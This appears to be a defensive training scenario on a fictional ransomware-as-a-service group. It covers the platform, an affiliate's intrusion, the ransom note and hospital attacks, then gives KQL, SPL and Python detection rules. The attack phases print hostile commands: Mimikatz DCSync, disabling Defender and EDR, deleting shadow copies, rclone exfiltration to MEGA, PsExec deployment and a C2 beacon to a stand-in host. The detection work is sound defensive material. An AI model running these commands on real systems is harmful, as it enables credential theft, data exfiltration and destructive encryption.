
SC-060: Ransomware-as-a-Service Platform

Scenario Overview

This scenario examines the complete lifecycle of a Ransomware-as-a-Service (RaaS) operation run by the criminal group "DARK FOUNDRY." Unlike single-incident scenarios, this walkthrough covers both the operator and affiliate perspectives: platform development, affiliate recruitment, customizable payload generation, multi-victim campaigns, double extortion, and payment infrastructure. Over a 3-month campaign, DARK FOUNDRY affiliates compromise 47 organizations across manufacturing, healthcare, and professional services, collecting $12M in total ransoms. Three hospitals are forced to divert patients, and one victim's data is published on the group's leak site after failed negotiations.

Environment: Multiple victim networks; RaaS platform at darkfoundry.example.onion; C2 infrastructure across 203.0.113.0/24
Initial Access: Varies by affiliate: exploits, phishing, access brokers (T1190, T1566, T1078)
Impact: 47 organizations compromised, $12M total ransoms, 3 hospitals diverted patients, 1 data leak
Difficulty: Moderate-Advanced (the platform lowers the skill barrier for affiliates)
Sector: Multi-sector: Healthcare, Manufacturing, Professional Services


Threat Actor Profile

DARK FOUNDRY operates as a RaaS platform provider, developing and maintaining the ransomware tooling, infrastructure, and payment systems while recruiting affiliates to conduct the actual intrusions. The group consists of ~15 core developers and operators, with 30-40 active affiliates at any given time. DARK FOUNDRY takes a 20-30% cut of all ransom payments, with the remaining 70-80% going to affiliates.

Motivation: Financial; platform revenue via affiliate commission model
Capability: High; custom ransomware development, bullet-proof hosting, cryptocurrency laundering
Target Sectors: Opportunistic; affiliates select targets, platform provides tools
Business Model: SaaS-style criminal enterprise with tiered affiliate access
Revenue (estimated): $12M in ransom payments over 3 months (DARK FOUNDRY share: ~$3M)

RaaS Ecosystem Context

Ransomware-as-a-Service has industrialized cybercrime:

  • Low barrier to entry: Affiliates need only basic intrusion skills; the platform handles payload generation, encryption, negotiation, and payment
  • Specialization: Access brokers sell initial access, affiliates deploy ransomware, operators manage infrastructure — each role specializes
  • Scale: A single RaaS platform enables dozens of simultaneous campaigns across hundreds of victims
  • Evolution: Modern RaaS platforms offer web dashboards, affiliate support, victim negotiation portals, and automatic cryptocurrency tumbling
  • Double extortion: Data exfiltration before encryption has become standard, ensuring payment pressure even when backups exist

Attack Timeline

Platform Operations Timeline

Timestamp  | Phase              | Action
2025-11-01 | Development        | DARK FOUNDRY launches v3.0 of ransomware builder platform
2025-11-15 | Recruitment        | Affiliate recruitment campaign on criminal forums
2025-12-01 | Operations Begin   | First affiliates onboarded; initial victim campaigns launched
2025-12-15 | First Payment      | First ransom payment received ($340,000 from manufacturing firm)
2026-01-10 | Scaling            | 35 active affiliates; victim count reaches 20 organizations
2026-02-01 | Healthcare Attacks | Affiliate "BONE SAW" hits 3 hospitals in a single week
2026-02-15 | Data Leak          | Failed negotiation; victim data published on leak site
2026-03-01 | Peak Operations    | 47 total victims; $12M in collected ransoms
2026-03-10 | Law Enforcement    | Joint FBI/Europol operation seizes 2 of 5 C2 servers

Representative Affiliate Campaign (Affiliate "RUSTED NAIL")

Timestamp (UTC)     | Phase             | Action
2026-01-05 14:00:00 | Access Purchase   | Purchased VPN credentials for Apex Manufacturing from access broker
2026-01-06 02:30:00 | Initial Access    | VPN login to 10.30.0.0/16 using purchased credentials
2026-01-06 03:00:00 | Discovery         | AD enumeration via SharpHound; network mapping
2026-01-06 08:00:00 | Credential Access | DCSync attack; obtained Domain Admin credentials
2026-01-07 01:00:00 | Exfiltration      | 450 GB exfiltrated via MEGA cloud storage (rclone)
2026-01-08 03:00:00 | Impact            | DARK FOUNDRY ransomware deployed across 340 endpoints
2026-01-08 03:30:00 | Extortion         | Ransom note: $2.1M demand with 72-hour countdown
2026-01-10          | Negotiation       | Victim negotiates via Tor portal; settles at $890,000
2026-01-11          | Payment           | Bitcoin payment to bc1qexampledf01...REDACTED
2026-01-11          | Split             | 75% to RUSTED NAIL ($667,500), 25% to DARK FOUNDRY ($222,500)

Technical Analysis

Phase 1: RaaS Platform Architecture

DARK FOUNDRY operates a sophisticated criminal SaaS platform accessible via Tor hidden service.

# DARK FOUNDRY RaaS platform architecture (from law enforcement takedown analysis)

# Platform URL: http://darkfoundry[REDACTED].onion (Tor hidden service)
# Registration: invite-only, vouched by existing affiliate or purchased for $5,000

# Platform components:
# 1. Affiliate Dashboard (React frontend)
#    - Campaign management: create, configure, monitor attacks
#    - Victim tracker: status, negotiation stage, payment received
#    - Payload builder: customizable ransomware binary generation
#    - Earnings dashboard: payment history, commission tracking
#
# 2. Payload Builder Service
#    - Generates unique ransomware binaries per campaign
#    - Configuration options:
#      - Target OS: Windows (PE), Linux (ELF), VMware ESXi
#      - Encryption: AES-256-CTR + RSA-4096 (hybrid)
#      - File extensions to encrypt (customizable target list)
#      - Excluded paths (keep OS bootable)
#      - Process kill list (databases, backup software, AV)
#      - Ransom note template (customizable per victim)
#      - C2 callback URL (per-affiliate infrastructure)
#      - Self-deletion timer (anti-forensics)
#
# 3. Victim Negotiation Portal
#    - Unique Tor .onion URL per victim
#    - Chat interface between victim and "support team"
#    - Countdown timer with automatic price increase
#    - Proof-of-decryption feature (decrypt 2 files free)
#    - Payment verification and decryptor delivery
#
# 4. Payment Infrastructure
#    - Bitcoin and Monero accepted
#    - Automatic payment splitting (affiliate/operator)
#    - Cryptocurrency tumbling via chain-hopping
#    - Payout to affiliates via Monero (privacy coin)
#
# 5. Leak Site
#    - Public Tor site listing non-paying victims
#    - Sample data published as pressure tactic
#    - Full data dump after negotiation deadline expires

Phase 2: Affiliate Toolkit and Payload Generation

An affiliate uses the DARK FOUNDRY dashboard to generate a customized ransomware payload for a specific victim.

# Payload generation (from captured affiliate dashboard interaction)

# Affiliate: RUSTED NAIL (affiliate ID: AF-0047)
# Campaign: APEX-MFG-2026-01
#
# Builder configuration submitted via dashboard:
# {
#   "campaign_id": "APEX-MFG-2026-01",
#   "target_os": "windows_x64",
#   "encryption_algo": "aes256ctr_rsa4096",
#   "target_extensions": [
#     ".docx", ".xlsx", ".pdf", ".pst", ".sql", ".bak",
#     ".mdb", ".dwg", ".cad", ".sldprt", ".step", ".iges"
#   ],
#   "exclude_paths": [
#     "C:\\Windows", "C:\\Program Files\\*\\*.exe",
#     "C:\\Program Files (x86)\\*\\*.exe"
#   ],
#   "process_kill_list": [
#     "sqlservr.exe", "oracle.exe", "veeam*",
#     "backup*", "MsMpEng.exe", "SentinelAgent.exe"
#   ],
#   "service_stop_list": [
#     "MSSQLSERVER", "OracleServiceXE", "VeeamBackupSvc",
#     "WinDefend", "SentinelAgent"
#   ],
#   "ransom_amount_usd": 2100000,
#   "deadline_hours": 72,
#   "c2_urls": [
#     "https://update-service.example.com/api/v1/check",
#     "https://cdn-static.example.com/health"
#   ],
#   "note_template": "dark_foundry_v3_manufacturing"
# }
#
# Generated payload:
# Filename: sysupdate.exe
# SHA256: b3c4d5e6f7g8...REDACTED
# Size: 847 KB
# Packer: custom UPX variant with anti-analysis
# C2 protocol: HTTPS with domain fronting
# Persistence: scheduled task "WindowsSystemUpdate"

Phase 3: Representative Affiliate Campaign — RUSTED NAIL vs. Apex Manufacturing

# Affiliate RUSTED NAIL campaign against Apex Manufacturing
# Network: 10.30.0.0/16 | Domain: apex-mfg.example.com

# Step 1: Initial access via purchased VPN credentials
# Source: access broker "TUNNEL_KING" on criminal forum
# Purchased: VPN credentials for apex-mfg.example.com
# Price: $3,500 (valid SSL-VPN account)
# Credentials: ext-contractor-07/REDACTED (SSL-VPN account; the same account appears in the EDR telemetry below)
# Login source: 203.0.113.101 (affiliate VPN exit)

# Step 2: Internal reconnaissance (from EDR telemetry)
# ProcessCreate: C:\Users\ext-contractor-07\SharpHound.exe
# CommandLine: SharpHound.exe -c All --outputdirectory C:\Users\Public\
# Output: 20260106030122_BloodHound.zip (SharpHound's default YYYYMMDDHHMMSS_BloodHound.zip naming)

# Step 3: Credential access via DCSync (T1003.006)
# DCSync needs DS-Replication-Get-Changes-All on the domain partition, so the
# account driving it already held replication rights at this point
# Mimikatz: lsadump::dcsync /domain:apex-mfg.example.com /user:da-admin
#           (the same command with /user:krbtgt pulls the krbtgt hash)
# Event 4662 on the DC: Control Access with property GUID
#   1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes-All) from 10.30.5.50
# Obtained: NTLM hash for APEX-MFG\da-admin (Domain Admin)

# Step 4: Disable security tools
# PsExec to endpoints:
# cmd /c net stop SentinelAgent /y
# cmd /c net stop WinDefend /y
# cmd /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"
#        /v DisableAntiSpyware /t REG_DWORD /d 1 /f
# Disabled AV/EDR on 340 endpoints over 2 hours
# Caveat for defenders: this sequence only works where tamper protection is off.
#   Current Defender builds ignore DisableAntiSpyware and tamper protection
#   refuses the service stop; the SentinelOne agent requires its anti-tamper
#   passphrase before it can be unloaded
# Events: Security 4689 (process exit) for the killed agent processes;
#         System 7036 (Service Control Manager: service entered the stopped state)

Phase 4: Data Exfiltration and Ransomware Deployment

# Step 5: Data staging and exfiltration
# Targeted shares:
#   \\FILE01.apex-mfg.example.com\Engineering\   — 180 GB (CAD files, blueprints)
#   \\FILE01.apex-mfg.example.com\Finance\        — 120 GB (financial records)
#   \\FILE01.apex-mfg.example.com\HR\             — 85 GB (employee PII)
#   \\SQL01\Backups\                               — 65 GB (ERP database)

# Exfiltration via rclone to MEGA cloud storage:
# C:\Users\Public\rclone.exe copy "\\FILE01\Engineering" mega:exfil-apex
#   --transfers 4 --bwlimit 40M
# Duration: ~8 hours for 450 GB total
# Destination: MEGA account registered with disposable email

# Step 6: Ransomware deployment via PsExec and GPO
# Method 1 (servers): PsExec with Domain Admin credentials
# psexec.exe \\10.30.1.10 -u APEX-MFG\da-admin -p REDACTED
#   -c sysupdate.exe -accepteula

# Method 2 (workstations): GPO scheduled task
# GPO: "Security Compliance Update — January 2026"
# Task: Run sysupdate.exe at 03:00 UTC on all domain workstations
# Affected: 340 endpoints across 3 sites

# Ransomware execution sequence (per endpoint):
# 1. Kill processes: sqlservr.exe, oracle.exe, veeam*, backup*
# 2. Stop services: MSSQLSERVER, VeeamBackupSvc, WinDefend
# 3. Delete shadow copies: vssadmin delete shadows /all /quiet
# 4. Disable recovery: bcdedit /set {default} recoveryenabled No
# 5. Encrypt files matching target extension list
# 6. Drop ransom note: DARK_FOUNDRY_RECOVERY.txt
# 7. Beacon to C2: POST https://update-service.example.com/api/v1/check
#    Body: {"id":"APEX-MFG-2026-01","status":"complete","files":142857}
# 8. Self-delete after 60 minutes: a one-shot scheduled task "selfclean" removes
#    sysupdate.exe and then unregisters itself (schtasks /delete /tn "selfclean" /f)

Phase 5: Negotiation and Payment

# Ransom note content (from DARK_FOUNDRY_RECOVERY.txt):

# ============================================================
# DARK FOUNDRY — YOUR NETWORK HAS BEEN COMPROMISED
# ============================================================
#
# What happened?
# Your files have been encrypted with AES-256 + RSA-4096.
# We have also downloaded 450 GB of your confidential data.
#
# What we took:
# - Engineering blueprints and CAD files
# - Financial records and tax filings
# - Employee personal information (SSN, bank details)
# - ERP database backups
#
# What you need to do:
# 1. Visit: http://df-negot-[REDACTED].onion
# 2. Enter your ID: APEX-MFG-2026-01
# 3. Follow instructions to pay $2,100,000 in Bitcoin
#
# Deadline: 72 hours. After deadline, price doubles.
# After 7 days, your data will be published on our leak site.
#
# DO NOT:
# - Contact law enforcement (we monitor for this)
# - Attempt to decrypt files yourself (you will destroy them)
# - Shut down systems (encryption keys are in memory)
# ============================================================

# Negotiation log (from captured Tor portal):
# 2026-01-08 10:00 — Victim opens negotiation portal
# 2026-01-08 10:05 — Victim: "We need proof you have our data"
# 2026-01-08 10:30 — Operator shares 3 sample files (financial statements)
# 2026-01-08 11:00 — Victim: "We need to verify decryption works"
# 2026-01-08 11:15 — Operator decrypts 2 victim-selected files (proof)
# 2026-01-09 09:00 — Victim: "Our insurance covers $900K max"
# 2026-01-09 10:00 — Operator: "Final offer: $890,000. Take it or data leaks."
# 2026-01-10 14:00 — Victim agrees to $890,000
# 2026-01-11 02:00 — Payment: 13.5 BTC to bc1qexampledf01...REDACTED
# 2026-01-11 02:15 — Automatic split: 10.125 BTC to affiliate, 3.375 BTC to DARK FOUNDRY
# 2026-01-11 02:30 — Decryptor delivered via Tor portal
# 2026-01-11 03:00 — Cryptocurrency tumbled through 4-hop chain before withdrawal

Phase 6: Healthcare Campaign — Affiliate "BONE SAW"

# Healthcare campaign overview (from combined victim reporting)
# Affiliate: BONE SAW (affiliate ID: AF-0062)
# Targets: 3 regional hospitals in a single week

# Victim 1: Riverside General Hospital (10.40.0.0/16)
# Access: Exploited Citrix NetScaler vulnerability (CVE-2024-XXXXX simulated)
# Encrypted: 890 endpoints including imaging systems (PACS)
# Impact: Emergency diversion for 36 hours
# Ransom: $1.8M demanded, $750K paid
# Patient impact: 142 patients diverted to other facilities

# Victim 2: St. Catherine Medical Center (10.41.0.0/16)
# Access: Phishing email to billing department
# Encrypted: 450 endpoints including EHR system
# Impact: Emergency diversion for 48 hours
# Ransom: $1.2M demanded, REFUSED — restored from backups in 5 days
# Data published on leak site (12,000 patient records)

# Victim 3: Oakwood Community Hospital (10.42.0.0/16)
# Access: RDP brute force (exposed after firewall misconfiguration)
# Encrypted: 320 endpoints
# Impact: Emergency diversion for 24 hours
# Ransom: $900K demanded, $400K paid
# Patient impact: 1 patient death potentially linked to diversion (under investigation)

# DARK FOUNDRY platform response to healthcare attacks:
# Internal affiliate channel message (from law enforcement intercept):
# "BONE SAW — hospitals are high risk, high reward. We don't prohibit it,
#  but you're on your own if law enforcement gets aggressive. We've updated
#  our affiliate agreement — healthcare victims require 48-hour approval
#  before data publication on leak site."

Detection Opportunities

KQL — RaaS Payload Behavioral Indicators

// Detect common RaaS ransomware execution patterns (shadow copy and boot
// recovery tampering, T1490). in~ is used because 'in' on FileName is case-sensitive.
DeviceProcessEvents
| where TimeGenerated > ago(1h)
| where FileName in~ ("vssadmin.exe", "wmic.exe", "bcdedit.exe", "wbadmin.exe")
| where ProcessCommandLine has_any (
    "delete shadows", "shadowcopy delete",
    "recoveryenabled No", "bootstatuspolicy ignoreallfailures",
    "delete catalog"
  )
| summarize
    CommandCount = count(),
    UniqueCommands = dcount(ProcessCommandLine),
    Commands = make_set(ProcessCommandLine),
    Devices = make_set(DeviceName)
    by InitiatingProcessFileName, bin(TimeGenerated, 5m)
| where CommandCount > 1
| sort by CommandCount desc

KQL — Security Tool Tampering Across Multiple Endpoints

// Detect mass disabling of security tools (pre-ransomware indicator).
// Product names are matched with a regex: has/has_any match whole terms, so
// "Sentinel" would never match the single term "SentinelAgent".
DeviceProcessEvents
| where TimeGenerated > ago(4h)
| where ProcessCommandLine has_any (
    "net stop", "sc stop", "taskkill",
    "DisableAntiSpyware", "DisableRealtimeMonitoring"
  )
| where ProcessCommandLine matches regex
    @"(?i)(WinDefend|Defender|Sentinel|CrowdStrike|CsFalcon|Carbon|Symantec|McAfee|Sophos|ESET|Trend)"
| summarize
    TamperCount = count(),
    AffectedDevices = dcount(DeviceName),
    DeviceList = make_set(DeviceName),
    Commands = make_set(ProcessCommandLine)
    by AccountName, bin(TimeGenerated, 30m)
| where AffectedDevices > 3
| sort by AffectedDevices desc
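
The same two rules (recovery inhibition from the first query, mass security-tool tampering from the second) as offline Python over constructed EDR process events, so the thresholds can be exercised without a tenant. This is an added example for this scenario, not code from any EDR product: the field layout mirrors DeviceProcessEvents, but every event, host name and account below is made up, and substring regexes stand in for the KQL term matching.

```python
"""Offline form of the two KQL rules above (recovery inhibition and mass
security-tool tampering), run over constructed EDR process events.
Added example for this scenario, not code from any EDR product; the field
layout mirrors DeviceProcessEvents but every event below is made up."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events: (UTC timestamp, device, account, command line)
SAMPLE_EVENTS = [
    ("2026-01-08T01:02:00Z", "WS-0101", "APEX-MFG\\da-admin", "net stop SentinelAgent /y"),
    ("2026-01-08T01:03:00Z", "WS-0102", "APEX-MFG\\da-admin", "net stop WinDefend /y"),
    ("2026-01-08T01:04:00Z", "WS-0103", "APEX-MFG\\da-admin",
     'reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'),
    ("2026-01-08T01:05:00Z", "WS-0104", "APEX-MFG\\da-admin", "sc stop SentinelAgent"),
    ("2026-01-08T03:00:10Z", "SRV-SQL01", "NT AUTHORITY\\SYSTEM", "vssadmin delete shadows /all /quiet"),
    ("2026-01-08T03:00:11Z", "SRV-SQL01", "NT AUTHORITY\\SYSTEM", "bcdedit /set {default} recoveryenabled No"),
    ("2026-01-08T03:00:12Z", "SRV-SQL01", "NT AUTHORITY\\SYSTEM", "wmic shadowcopy delete"),
    ("2026-01-08T09:15:00Z", "WS-0200", "APEX-MFG\\helpdesk1", "net stop Spooler"),    # not a security product
    ("2026-01-07T14:00:00Z", "WS-0300", "APEX-MFG\\admin2", "net stop WinDefend /y"),   # one host, below threshold
]

# Substring matching on purpose: KQL 'has' is whole-term, so "Sentinel" would
# not match the single term "SentinelAgent"; these regexes do.
TAMPER_VERB = re.compile(r"(net stop|sc stop|taskkill|DisableAntiSpyware|DisableRealtimeMonitoring)", re.I)
SECURITY_PRODUCT = re.compile(r"(WinDefend|Defender|Sentinel|CrowdStrike|CsFalcon|Carbon|Symantec|McAfee|Sophos|ESET|Trend)", re.I)
RECOVERY_INHIBIT = re.compile(r"(delete shadows|shadowcopy delete|recoveryenabled No|bootstatuspolicy ignoreallfailures)", re.I)


def _bucket(ts, minutes):
    """Floor an ISO timestamp to a window start, like KQL bin(TimeGenerated, Nm)."""
    t = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    start = t - timedelta(minutes=t.minute % minutes, seconds=t.second)
    return start.strftime("%Y-%m-%dT%H:%MZ")


def mass_tampering(events, window_min=30, min_devices=3):
    """Accounts that hit security tooling on more than min_devices hosts in one window."""
    hits = defaultdict(set)
    for ts, device, account, cmd in events:
        if TAMPER_VERB.search(cmd) and SECURITY_PRODUCT.search(cmd):
            hits[(account, _bucket(ts, window_min))].add(device)
    return {k: sorted(v) for k, v in hits.items() if len(v) > min_devices}


def recovery_inhibition(events, window_min=5, min_commands=2):
    """Hosts running at least min_commands distinct recovery-inhibiting commands in one window."""
    hits = defaultdict(set)
    for ts, device, _account, cmd in events:
        if RECOVERY_INHIBIT.search(cmd):
            hits[(device, _bucket(ts, window_min))].add(cmd)
    return {k: sorted(v) for k, v in hits.items() if len(v) >= min_commands}


if __name__ == "__main__":
    for key, devices in mass_tampering(SAMPLE_EVENTS).items():
        print("mass tampering:", key, devices)
    for key, cmds in recovery_inhibition(SAMPLE_EVENTS).items():
        print("recovery inhibition:", key, cmds)
```

The da-admin burst across four hosts inside one 30-minute window trips mass_tampering, while the single helpdesk "net stop Spooler" and the lone admin2 event do not; the three-command sequence on SRV-SQL01 trips recovery_inhibition. Renamed binaries defeat the FileName checks in the KQL, which is why both rules key on command-line content.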

KQL — Common RaaS Affiliate TTP Fingerprinting

// Detect TTP patterns shared across RaaS affiliate campaigns
let affiliate_indicators = dynamic([
    "SharpHound", "BloodHound", "Rubeus", "Mimikatz",
    "rclone", "megacmd", "psexec", "wmiexec"
]);
DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName has_any (affiliate_indicators)
    or ProcessCommandLine has_any (affiliate_indicators)
| summarize
    ToolCount = dcount(FileName),
    ToolsUsed = make_set(FileName),
    FirstSeen = min(TimeGenerated),
    LastSeen = max(TimeGenerated)
    by DeviceName, AccountName
| where ToolCount >= 3
| extend AttackDuration = datetime_diff('hour', LastSeen, FirstSeen)
| sort by ToolCount desc

KQL — Cryptocurrency Payment Infrastructure Detection

// Detect access to ransomware negotiation portals from the corporate network.
// Caveat: Tor Browser traffic is encrypted end to end, so a .onion hostname only
// shows up in RemoteUrl when a tor2web-style gateway is used; pair this with
// DeviceProcessEvents for tor.exe / Tor Browser launches. The keyword matches
// are noisy ("payment" hits plenty of legitimate sites) and are a hunting
// aid, not an alert. Regex is used because 'has' matches whole terms only.
DeviceNetworkEvents
| where TimeGenerated > ago(7d)
| where RemoteUrl has ".onion" or RemoteUrl has "tor2web"
    or RemoteUrl matches regex @"(?i)(negot|payment|decrypt|recover)"
| summarize
    ConnectionCount = count(),
    UniqueURLs = dcount(RemoteUrl),
    URLs = make_set(RemoteUrl),
    Devices = make_set(DeviceName)
    by bin(TimeGenerated, 1h)
| sort by TimeGenerated desc

SPL — Mass GPO Deployment Detection (Ransomware Distribution)

Prerequisite: Directory Service Changes auditing must be enabled and the Policies container must carry a SACL, or no 5136/5137 events are produced. The scenario's GPO pushed a scheduled task, which shows up as the Scheduled Tasks CSE GUID being added to gPCMachineExtensionNames, so the query checks attribute values for the Scripts and Scheduled Tasks CSE GUIDs as well as attribute names containing "script". (stats does not accept span; the hour bucketing is done with bin.)

index=wineventlog sourcetype="xmlwineventlog:security"
  (EventCode=5136 OR EventCode=5137)
  ObjectClass="groupPolicyContainer"
| bin _time span=1h
| stats count as gpo_changes
        values(AttributeLDAPDisplayName) as modified_attributes
        values(AttributeValue) as attribute_values
        values(ObjectDN) as gpo_objects
        by _time SubjectUserName Computer
| eval attrs=mvjoin(modified_attributes, ";"), vals=mvjoin(attribute_values, ";")
| eval has_scripts=if(match(attrs, "(?i)script")
        OR match(vals, "(?i)(42B5FAAE-6536-11D2-AE5A-0000F87571E3|AADCED64-746C-4633-A97C-D61349046527)"),
        "YES", "NO")
| where gpo_changes > 2 AND has_scripts="YES"
| eval severity="CRITICAL"
| sort -gpo_changes
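
What the query above is actually inspecting is the gPCMachineExtensionNames attribute value, which lists the client-side extensions (CSEs) a GPO activates. The parser below is an added example for this scenario, not code from any product: it splits that value into CSE and tool GUIDs and flags a 5136 event that adds a code-executing CSE. The 5136 fields are constructed, the GPO GUID in ObjectDN and the "benign" tool GUID are made up, and the named CSE GUIDs are the documented Group Policy ones.

```python
"""Parse the gPCMachineExtensionNames attribute carried in a 5136 event and
flag GPOs that gained a client-side extension (CSE) that runs code on clients.
Added example for this scenario, not from any product: the 5136 fragment is
constructed; the named CSE GUIDs are the documented Group Policy ones."""
import re

# Well-known CSE GUIDs as they appear in gPCMachineExtensionNames.
CSE_NAMES = {
    "{42B5FAAE-6536-11D2-AE5A-0000F87571E3}": "Scripts (Startup/Shutdown)",
    "{AADCED64-746C-4633-A97C-D61349046527}": "Preferences: Scheduled Tasks",
    "{35378EAC-683F-11D2-A89A-00C04FBBCFA2}": "Registry (Administrative Templates)",
}
# CSEs whose presence means the GPO executes something on every client in scope.
EXECUTION_CSES = {
    "{42B5FAAE-6536-11D2-AE5A-0000F87571E3}",
    "{AADCED64-746C-4633-A97C-D61349046527}",
}

GROUP_RE = re.compile(r"\[((?:\{[0-9A-Fa-f-]{36}\})+)\]")
GUID_RE = re.compile(r"\{[0-9A-Fa-f-]{36}\}")


def parse_extension_names(value):
    """'[{CSE}{tool}{tool}][{CSE}{tool}]' -> {CSE GUID: [tool GUIDs]}.
    The first GUID in each bracketed group is the CSE; the rest are the
    editing-tool GUIDs that wrote the settings."""
    result = {}
    for group in GROUP_RE.findall(value):
        guids = [g.upper() for g in GUID_RE.findall(group)]
        result[guids[0]] = guids[1:]
    return result


def execution_cses(value):
    """Names of code-executing CSEs present in a gPCMachineExtensionNames value."""
    return sorted(CSE_NAMES[c] for c in parse_extension_names(value) if c in EXECUTION_CSES)


def is_suspicious_gpo_change(event):
    """True when a 5136 event writes a code-executing CSE into a GPO."""
    return (event.get("AttributeLDAPDisplayName") == "gPCMachineExtensionNames"
            and bool(execution_cses(event.get("AttributeValue", ""))))


# Constructed 5136 fields for a GPO that just received a Preferences Scheduled
# Task. The all-zero GUID group is routinely present and names no real CSE.
# The GPO GUID in ObjectDN is made up.
SAMPLE_5136 = {
    "EventCode": 5136,
    "ObjectClass": "groupPolicyContainer",
    "ObjectDN": "CN={11111111-2222-3333-4444-555555555555},CN=Policies,CN=System,DC=apex-mfg,DC=example,DC=com",
    "AttributeLDAPDisplayName": "gPCMachineExtensionNames",
    "AttributeValue": "[{00000000-0000-0000-0000-000000000000}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]"
                      "[{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]",
}
# A registry-only (Administrative Templates) change for contrast; the tool GUID is made up.
BENIGN_VALUE = "[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{22222222-3333-4444-5555-666666666666}]"

if __name__ == "__main__":
    print(parse_extension_names(SAMPLE_5136["AttributeValue"]))
    print(execution_cses(SAMPLE_5136["AttributeValue"]), is_suspicious_gpo_change(SAMPLE_5136))
    print(execution_cses(BENIGN_VALUE))
```

Keying on the CSE GUID rather than the GPO display name is the point: the scenario's GPO was called "Security Compliance Update", which no name-based rule would catch, but it could not deliver a scheduled task without registering the Scheduled Tasks CSE.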

SPL — RaaS C2 Beacon Pattern Detection

index=proxy (sourcetype="squid" OR sourcetype="bluecoat") cs_method=POST
| eval uri_path=lower(cs_uri_path)
| where match(uri_path, "/(api|check|health|update|status|beacon)")
| bin _time span=1h
| stats count as callbacks
        avg(bytes_out) as avg_post_size
        stdev(bytes_out) as stdev_post_size
        values(cs_uri_path) as paths
        by _time src_ip dest_host
| where callbacks > 10 AND stdev_post_size < 50
| eval regularity_score=if(stdev_post_size < 20 AND callbacks > 20, "HIGH", "MEDIUM")
| sort -callbacks
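
The SPL above scores flows on POST-body size spread alone. The added example below (this scenario's, not any proxy vendor's code) runs that check over constructed proxy lines and adds the inter-arrival regularity test the SPL lacks, which is what separates the implant's "status" callbacks from a person hitting an intranet API with the same path pattern. The log layout is a constructed space-separated form rather than Squid's native format, and every host, address and size is made up.

```python
"""Beacon scoring over constructed proxy log lines: the POST-size check the
SPL above makes plus an inter-arrival regularity check it does not.
Added example for this scenario, not from any proxy vendor; the log lines use
a constructed space-separated layout rather than Squid's native format."""
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

FMT = "%Y-%m-%dT%H:%M:%SZ"
PATH_RE = re.compile(r"/(api|check|health|update|status|beacon)")


def _beacon_lines():
    # Implant from the execution sequence above: POST to /api/v1/check about
    # every 60 s, a few seconds of jitter, near-constant JSON body size.
    base = datetime(2026, 1, 8, 3, 5, 0)
    jitter = [0, 1, -1, 0, 2, 0, -1, 1, 0, 0, 1, -1]
    sizes = [118, 118, 119, 118, 118, 117, 118, 118, 118, 119, 118, 118]
    return [f"{(base + timedelta(seconds=60 * i + jitter[i])).strftime(FMT)} "
            f"10.30.5.50 POST update-service.example.com /api/v1/check {sizes[i]}"
            for i in range(12)]


def _user_lines():
    # A person uploading files to an intranet API: bursty timing, varied sizes.
    base = datetime(2026, 1, 8, 9, 0, 0)
    offsets = [0, 25, 31, 140, 142, 600, 615, 990, 1400, 1405, 2200, 2210]
    sizes = [512, 2048, 88, 4096, 3100, 256, 9200, 640, 1300, 77, 5000, 410]
    return [f"{(base + timedelta(seconds=offsets[i])).strftime(FMT)} "
            f"10.30.7.21 POST intranet.apex-mfg.example.com /api/upload {sizes[i]}"
            for i in range(12)]


# "<utc time> <src_ip> <method> <dest_host> <path> <bytes_out>", constructed.
SAMPLE_PROXY_LOG = _beacon_lines() + _user_lines()


def parse_line(line):
    ts, src, method, host, path, size = line.split()
    return datetime.strptime(ts, FMT), src, method, host, path, int(size)


def score_beacons(lines, min_callbacks=10, max_size_stdev=50.0, max_interval_cv=0.1):
    """Per (src_ip, dest_host): flag POST flows with many callbacks, small
    body-size spread and small inter-arrival spread (coefficient of variation)."""
    flows = defaultdict(list)
    for line in lines:
        ts, src, method, host, path, size = parse_line(line)
        if method == "POST" and PATH_RE.search(path.lower()):
            flows[(src, host)].append((ts, size))
    findings = {}
    for key, obs in flows.items():
        if len(obs) <= min_callbacks:
            continue
        obs.sort()
        sizes = [s for _, s in obs]
        gaps = [(b - a).total_seconds() for (a, _), (b, _) in zip(obs, obs[1:])]
        size_sd = statistics.pstdev(sizes)
        gap_mean = statistics.mean(gaps)
        gap_cv = statistics.pstdev(gaps) / gap_mean if gap_mean else float("inf")
        if size_sd < max_size_stdev and gap_cv < max_interval_cv:
            findings[key] = {"callbacks": len(obs), "size_stdev": round(size_sd, 1),
                             "interval_s": round(gap_mean, 1), "interval_cv": round(gap_cv, 3)}
    return findings


if __name__ == "__main__":
    for key, finding in score_beacons(SAMPLE_PROXY_LOG).items():
        print(key, finding)
```

Both flows match the path regex and both exceed ten POSTs in the hour; only the implant survives the two spread checks (about 60 s between callbacks with a coefficient of variation near 0.03, body size within a byte or two). An affiliate can defeat this by randomizing jitter and padding bodies, so treat the thresholds as tunable and pair the rule with the process-level indicators above.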

SPL — Cross-Victim TTP Correlation

index=threat_intel sourcetype="ioc_feed"
  (ioc_type="sha256" OR ioc_type="domain" OR ioc_type="ip")
| lookup internal_detections.csv ioc_value OUTPUT detection_count victim_org
| where detection_count > 0
| stats dc(victim_org) as orgs_affected
        values(victim_org) as org_list
        values(ioc_type) as ioc_types
        by ioc_value
| where orgs_affected > 1
| eval raas_indicator=if(orgs_affected > 3, "HIGH - likely RaaS platform IOC",
    "MEDIUM - shared infrastructure")
| sort -orgs_affected

MITRE ATT&CK Mapping

Tactic               | Technique ID | Technique Name                                               | Scenario Phase
Resource Development | T1587.001    | Develop Capabilities: Malware                                | RaaS platform and payload builder
Resource Development | T1650        | Acquire Access                                               | VPN credentials bought from access broker
Initial Access       | T1190        | Exploit Public-Facing Application                            | Citrix exploitation (BONE SAW)
Initial Access       | T1078        | Valid Accounts                                               | Purchased VPN credentials
Initial Access       | T1566.001    | Phishing: Spearphishing Attachment                           | Phishing-based affiliate access
Initial Access       | T1110        | Brute Force                                                  | RDP brute force (BONE SAW, Oakwood)
